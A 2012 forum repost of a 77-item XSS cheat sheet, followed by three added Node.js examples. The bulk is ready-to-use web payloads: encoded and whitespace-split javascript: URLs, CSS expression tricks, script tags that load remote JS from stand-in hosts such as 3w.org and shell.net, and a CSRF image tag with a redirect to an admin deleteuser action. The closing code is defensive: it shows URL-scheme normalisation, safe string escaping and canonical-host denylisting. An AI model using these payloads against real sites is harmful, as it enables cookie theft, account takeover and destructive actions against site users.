XSS cross-site scripting attack round-up

Posted 2012-9-5 14:56:34
It seems t00ls has rather little material on XSS; I saw this good stuff and copied it over, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: URL
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode, no quotes needed (charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding (charcode calculator)
<IMG SRC=jav..omitted..S')>

(9) Decimal entities padded to 7 digits, no semicolons (charcode calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex entities, also without semicolons (charcode calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the word javascript (a literal TAB character between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript: the extreme form of the same vector, with a carriage return between every character of the tag (the copy here has them collapsed)
<IMG SRC="javascript:alert('XSS')">

(16) Beating a length limit (all fragments must be on the same page): each <script> appends one piece of a document.write call and the last one evals the assembled string
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (null bytes are basically ineffective in practice here, since there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape (when the server prefixes each quote with a backslash, the injected backslash consumes that escape and the quote closes the string)
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (onload handler)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the URL (any of 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (any name works: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with a comment-split expression (only the tail of the vector survived the copy)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can be used to smuggle in your XSS code (this assembles and evals getURL("javascript:alert('XSS');"))
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, put the JS code in a file with an image name and load it from there (the URL below is illustrative)
<SCRIPT SRC="http://3w.org/XSS/xss.jpg"></SCRIPT>

(59) IMG embedded commands: the viewer's browser requests this URL with the viewer's cookies, so any state-changing action reachable by GET runs with their privileges (CSRF)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands 2 (a.jpg lives on your own server; this Apache config line redirects requests for it to the target's admin action, so the image tag itself looks harmless)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing quote and angle-bracket filters (HTML quote encapsulation)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL obfuscation: an IP address instead of the hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword (decimal) IP (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: whitespace characters (tab, newline) inside the scheme and host, and octets written in decimal, octal and hex (66.000146.0x7.147 is 66.102.7.147)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the http:
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
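The encoding and whitespace tricks in vectors 4, 5, 8-15, 17, 19 and 47 all rely on the same gap: the filter looks at the raw attribute value, but the browser decodes character references and strips control characters and tab/newline before it ever looks for a scheme. The following is an added example, not code from the original post; it reproduces that normalisation in Node.js (no dependencies) over constructed sample values and contrasts it with a plain regex filter. The sample strings, the `DANGEROUS_SCHEMES` list and the function names are this example's own.

```javascript
// Added example, not from the original post: how a browser reduces the
// obfuscated SRC values of vectors 4, 5, 9, 10, 12, 13, 17, 19 and 47 to the
// scheme "javascript", and why a filter that greps the raw markup misses them.
// Node.js, no dependencies. SAMPLES are constructed from the vectors above.

// Decode numeric character references (&#NNN; and &#xHH;), with or without the
// trailing semicolon, as the HTML tokenizer does inside attribute values.
function decodeCharRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (whole, num) => {
    const isHex = num[0].toLowerCase() === 'x';
    const cp = isHex ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? whole : String.fromCodePoint(cp);
  });
}

// Reduce an attribute value to the scheme the URL parser will actually see.
function effectiveScheme(attrValue) {
  let v = decodeCharRefs(attrValue);
  // Legacy IE dropped NUL bytes (vectors 17/18); stripping them is the
  // conservative choice for a filter.
  v = v.replace(/\0/g, '');
  // The URL parser strips leading/trailing C0 controls and spaces (19, 47) ...
  v = v.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  // ... and removes ASCII tab, LF and CR anywhere in the input (11-15).
  v = v.replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;   // schemes are case-insensitive (4)
}

const DANGEROUS_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

function isDangerousUrl(attrValue) {
  return DANGEROUS_SCHEMES.has(effectiveScheme(attrValue));
}

// What a typical blacklist filter does: look for the literal string in the raw value.
function naiveFilterBlocks(attrValue) {
  return /javascript:/i.test(attrValue);
}

// Constructed samples: the SRC value of each vector, alert('XSS') shortened to alert(1).
const SAMPLES = {
  v4:  "JaVaScRiPt:alert(1)",
  v5:  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
  v9:  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)",
  v10: "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61lert(1)",
  v12: "jav&#x09;ascript:alert(1)",
  v13: "jav&#x0A;ascript:alert(1)",
  v17: "java\0script:alert(1)",
  v19: " &#14;  javascript:alert(1)",
  v47: "&#1;javascript:alert(1)",
  benign: "https://example.org/logo.png",
};

// Run both checks over every sample; returns {name: {naive, normalized}}.
function report() {
  const out = {};
  for (const [name, value] of Object.entries(SAMPLES)) {
    out[name] = { naive: naiveFilterBlocks(value), normalized: isDangerousUrl(value) };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(report());
}
```

Run it with `node` to see the table: the naive check catches only the samples that still contain the literal text `javascript:`, while every sample except the benign URL yields the scheme `javascript` after normalisation. Note the greedy hex rule in `decodeCharRefs`: `&#x3A` followed directly by `alert` would swallow the `a` as a hex digit, which is exactly what browsers do, so the constructed v10 sample ends the hex run with `&#x61lert` instead.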
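Vector 29 (`\";alert('XSS');//`) deserves a worked example because the failure is in the server's escaping, not in the browser. The following is an added example, not code from the original post: a constructed server template that drops user input into a JavaScript string, the quote-only escaper that vector 29 defeats, and a `\uXXXX` string-literal encoder that closes the hole. It runs under Node.js with no dependencies; `alert()` is replaced by setting `ctx.pwned` so the result can be checked, and the template, payload and function names are this example's own.

```javascript
// Added example, not from the original post: vector 29 ( \";alert('XSS');// )
// against a server that "escapes" quotes by prefixing a backslash, and the
// string-literal encoding that closes the hole. Node.js, no dependencies.
// The template and payload are constructed for the demo; alert() is replaced
// by ctx.pwned = true so the outcome can be checked programmatically.

// The broken escaper: every double quote gets a backslash, nothing else does.
function naiveQuote(s) {
  return '"' + s.replace(/"/g, '\\"') + '"';
}

// A safe JS string literal: every character outside [A-Za-z0-9] becomes \uXXXX,
// so quotes, backslashes, "</script>" and U+2028/2029 never reach the parser raw.
function safeQuote(s) {
  return '"' + s.replace(/[^A-Za-z0-9]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')) + '"';
}

// The server-side template: user input dropped into a JS variable initialiser.
function renderScript(userInput, quote) {
  return 'var name = ' + quote(userInput) + ';\n' +
         'ctx.name = name;';
}

// Execute the rendered script the way the browser would, in a function scope.
function runRendered(userInput, quote) {
  const ctx = { pwned: false, name: undefined };
  new Function('ctx', renderScript(userInput, quote))(ctx);
  return ctx;
}

// Vector 29 adapted: backslash, quote, the attacker's statement, then // to
// comment out the closing quote the template emits.
const PAYLOAD = '\\";ctx.pwned=true;//';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderScript(PAYLOAD, naiveQuote));
  console.log('naive ->', runRendered(PAYLOAD, naiveQuote));
  console.log(renderScript(PAYLOAD, safeQuote));
  console.log('safe  ->', runRendered(PAYLOAD, safeQuote));
}
```

With `naiveQuote` the rendered line is `var name = "\\";ctx.pwned=true;//";`: the attacker's backslash turns the server's escape into a literal backslash, the quote closes the string, and the injected statement runs. With `safeQuote` the same input round-trips into `name` unchanged. `JSON.stringify` alone is not a substitute here, because it leaves `/` and `<` untouched and so still lets `</script>` through.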
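Vectors 68-76 work against link filters that compare the raw `href` string. The following is an added example, not code from the original post: it feeds those links through Node's built-in WHATWG `URL` parser (the same normalisation a browser applies) to show what host each one really names, and contrasts a denylist matched on the raw string with the same denylist matched on the canonical host. Node.js 10 or later, no dependencies; the `INTERNAL_HOSTS` denylist and the `victim.example` base URL are constructed for the demo, and the links are the ones from the list.

```javascript
// Added example, not from the original post: what vectors 68-76 look like after
// the WHATWG URL parser (Node's built-in URL class) has normalised them, and why
// a host denylist must be applied to that normalised host rather than to the raw
// href. Node.js >= 10, no dependencies. VECTORS are the links from the list;
// INTERNAL_HOSTS and the base URL are constructed for the demo.

const INTERNAL_HOSTS = new Set(['127.0.0.1', '192.168.0.1']);

// The host the browser will actually connect to, or null if href does not parse.
// The parser removes tab/newline anywhere, percent-decodes the host, folds case,
// and collapses decimal/octal/hex/dword IPv4 spellings to dotted decimal.
function canonicalHost(href, base = 'https://victim.example/') {
  try {
    return new URL(href, base).hostname;
  } catch (e) {
    return null;
  }
}

// What many filters do: look for the literal blocked string in the raw href.
function naiveDenylistBlocks(href) {
  for (const h of INTERNAL_HOSTS) {
    if (href.includes(h)) return true;
  }
  return false;
}

// The same policy applied after normalisation; the trailing dot of vector 76
// names the same DNS entry, so it is stripped before the lookup.
function canonicalDenylistBlocks(href) {
  const host = canonicalHost(href);
  return host !== null && INTERNAL_HOSTS.has(host.replace(/\.$/, ''));
}

const VECTORS = {
  v68: 'http://127.0.0.1/',
  v69: 'http://%33%77%2E%6F%72%67',
  v70: 'http://3232235521',
  v71: 'http://0xc0.0xa8.0x00.0x01',
  v72: 'http://0300.0250.0000.0001',
  v73: 'h\ntt\tp://6\t6.000146.0x7.147/',
  v74: '//www.google.com/',
  v75: 'http://google.com/',
  v76: 'http://www.google.com./',
  v77: "javascript:document.location='http://www.google.com/'",
};

// {vector: {host, naive, canonical}} for every entry.
function report() {
  const out = {};
  for (const [name, href] of Object.entries(VECTORS)) {
    out[name] = {
      host: canonicalHost(href),
      naive: naiveDenylistBlocks(href),
      canonical: canonicalDenylistBlocks(href),
    };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(report());
}
```

Vectors 70, 71 and 72 all come back as `192.168.0.1` and are blocked only by the canonical check; vector 73 resolves to `66.102.7.147` once the tab and newline are removed and the octal and hex octets are converted. Vector 77 parses too, with an empty hostname, which is a reminder that a link filter has to check the scheme as well as the host. The same normalisation is what makes an allowlist of canonical hosts the robust form of this check.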